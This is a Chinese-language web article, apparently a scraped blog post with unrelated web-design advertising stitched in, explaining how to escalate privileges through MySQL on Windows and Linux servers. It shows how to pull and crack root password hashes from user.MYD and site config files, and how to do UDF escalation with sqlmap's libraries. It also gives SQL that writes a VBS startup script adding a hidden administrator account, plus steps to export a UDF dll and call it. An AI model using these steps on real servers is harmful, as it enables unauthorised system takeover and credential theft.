mysql權(quán)限怎么提權(quán),MySQL 權(quán)限

如何通過mysql提權(quán)獲得flag值

利用mysql提權(quán)的前提就是,服務(wù)器安裝了mysql,mysql的服務(wù)沒有降權(quán),(降權(quán)也可以提,沒降權(quán)的話就最好了),是默認安裝以系統(tǒng)權(quán)限繼承的(system權(quán)限). 并且獲得了root的賬號密碼

阜平網(wǎng)站建設(shè)公司成都創(chuàng)新互聯(lián),阜平網(wǎng)站設(shè)計制作，有大型網(wǎng)站制作公司豐富經(jīng)驗。已為阜平上千家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設(shè)公司要多少錢，請找那個售后服務(wù)好的阜平做網(wǎng)站的公司定做！

先來說說我是咋判斷一臺windows服務(wù)器上的mysql有沒有降權(quán)的. 0.0如果能運行cmd的話,我會先看看有啥用戶先,如果有mysql mssql這樣用戶名,或者類似的.我就會猜測他的mssql服務(wù)或者mysql的已經(jīng)被降權(quán)運行了.但并不代表不能提權(quán),只要能運行cmd..

接著說一下,判斷服務(wù)器上是否開啟了mysql服務(wù). 一般在拿到webshell的時候,都會掃描一下端口,如果開啟了3306端口的話,我會telnet 過去看看- -.忘了有無回顯~(提權(quán)的時候,大多數(shù) 3306端口的都是不支持外鏈的.呃,我遇到的大多數(shù)是這樣, 有root可以開啟外鏈.) 當(dāng)然也有一些管理員會把mysql的默認端口改掉.另外一個判斷的方法就是網(wǎng)站是否支持php,一般支持php的網(wǎng)站都用mysql數(shù)據(jù)庫的.php+mysql啊,好基友啊好麗友- -~（當(dāng)然,也有一些網(wǎng)站用其他的一些更專業(yè)的數(shù)據(jù)庫）.

再說說如何查找mysql root的密碼.

MYSQL所有設(shè)置默認都保存在“C:\Program Files\MYSQL\MYSQL Server 5.0\data\MYSQL”中，也就是安裝程序的data目錄下，如圖2所示，有關(guān)用戶一共有三個文件即user.frm、user.MYD和 user.MYI，MYSQL數(shù)據(jù)庫用戶密碼都保存在user.MYD文件中，包括root用戶和其他用戶的密碼。

User.frm user.myd User.myi

這幾個文件.在webshell下,下載下來,解密.用c32asm或者其他的一些文本編輯器user.MYD打開.

A30F80616A023BDFC9

復(fù)制到cmd5.com那查一下,或者用cain爆破一下.

打開后使用二進制模式進行查看，如圖所示，可以看到在root用戶后面是一串字符串，選中這些字符串將其復(fù)制到記事本中，這些字符串即為用戶加密值，即A30F80616A023BDFC9 。

具體使用cain破解的,我這就不演示了

還有一個查找的方法就是,一些php網(wǎng)站安裝的時候用的是root用戶,例如dedecms,他數(shù)據(jù)庫安裝的信息就是寫在data/common.inc.php

MYSQL提權(quán)(LINUX)

select @@global.secure_file_priv;

查看MySQL服務(wù)器的文件讀寫權(quán)限

如果是NULL就是完全禁止

udf提權(quán)用到的so文件（linux）在kali下默認集成，路徑為 /usr/share/sqlmap/udf/mysql/linux/64(32)

或者 searchsploit mysql udf

把對應(yīng)的內(nèi)容編譯出來

mysql創(chuàng)建函數(shù)命令

windows 2008 怎么利用mysql提權(quán)

mysql 5.1版本以上，必須把udf文件放到mysql安裝目錄下的lib/plugin下才能創(chuàng)建自定義函數(shù)，mysql into dumpfile并不能創(chuàng)建文件夾，所以mysql 5.1以上的版本，root權(quán)限提權(quán)就很困難了，目前已有的方法只有寫啟動項如下：

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user 007hack.com qwer1234!@#$qwe /add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 007hack.com /add"",0) " );

windows 2008啟動項：

C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs

select * from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";

寫啟動項缺陷：

1、需要服務(wù)器重啟（如果管理員3389遠程桌面登陸時注銷了用戶，再次3389連接時，這個腳本就會運行，添加一個管理員，不需要重啟）。

2、安全軟件可能會攔截。

補充:

如果mysql小于5.1是root權(quán)限，windows 2008一樣可以拿到系統(tǒng)權(quán)限（mysql無降權(quán)處理）

1、mysql導(dǎo)出一個dll

SELECT udf FROM 007hack_tab INTO DUMPFILE 'c:/007hack.dll

//udf內(nèi)容網(wǎng)上早有公開

2、創(chuàng)建一個函數(shù)

create function myconnect returns integer soname 'c:\\007hack.dll

//c盤要可以寫，注意是”\\”

3、調(diào)用這個函數(shù)

select myconnect('".$chost."','".$cport."')

//這只是一個例子

當(dāng)前名稱：mysql權(quán)限怎么提權(quán),MySQL 權(quán)限
瀏覽地址：http://muchs.cn/article30/hcpepo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信公眾號、自適應(yīng)網(wǎng)站、全網(wǎng)營銷推廣、企業(yè)建站、Google、小程序開發(fā)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)